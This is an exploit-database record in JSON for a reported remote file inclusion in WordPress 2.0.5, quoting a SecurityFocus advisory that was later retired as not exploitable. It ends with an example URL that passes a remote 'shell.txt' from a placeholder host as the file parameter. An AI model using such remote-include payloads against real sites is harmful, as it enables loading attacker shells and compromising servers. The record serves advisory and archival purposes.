{"lastseen": "2020-04-01T19:05:05", "references": [], "description": "\nWordPress 2.0.5 - functions.php Remote File Inclusion", "edition": 1, "reporter": "_ANtrAX_", "exploitpack": {"type": "webapps", "platform": "php"}, "published": "2006-11-11T00:00:00", "title": "WordPress 2.0.5 - functions.php Remote File Inclusion", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": -0.2, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.2}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2006-11-11T00:00:00", "id": "EXPLOITPACK:32EA596D79DF744E4E3278EA6ECCEF69", "href": "", "viewCount": 5, "sourceData": "source: https://www.securityfocus.com/bid/21004/info\n\nWordPress is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.\n\nExploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.\n\nWordPress version 2.0.5 is vulnerable.\n\nThe vulnerability described in this BID is not exploitable, as the parameter specified can not contain user-specified data. This BID is therefore being retired.\n\nhttp://www.example.com/wp-includes/functions.php?file=http://www.example2.com/shell.txt?", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645580969, "score": 1659814272}, "_internal": {"score_hash": "606ecc60bd58446de264c6eca7a2a874"}}
WordPress 2.0.5 - functions.php Remote File Inclusion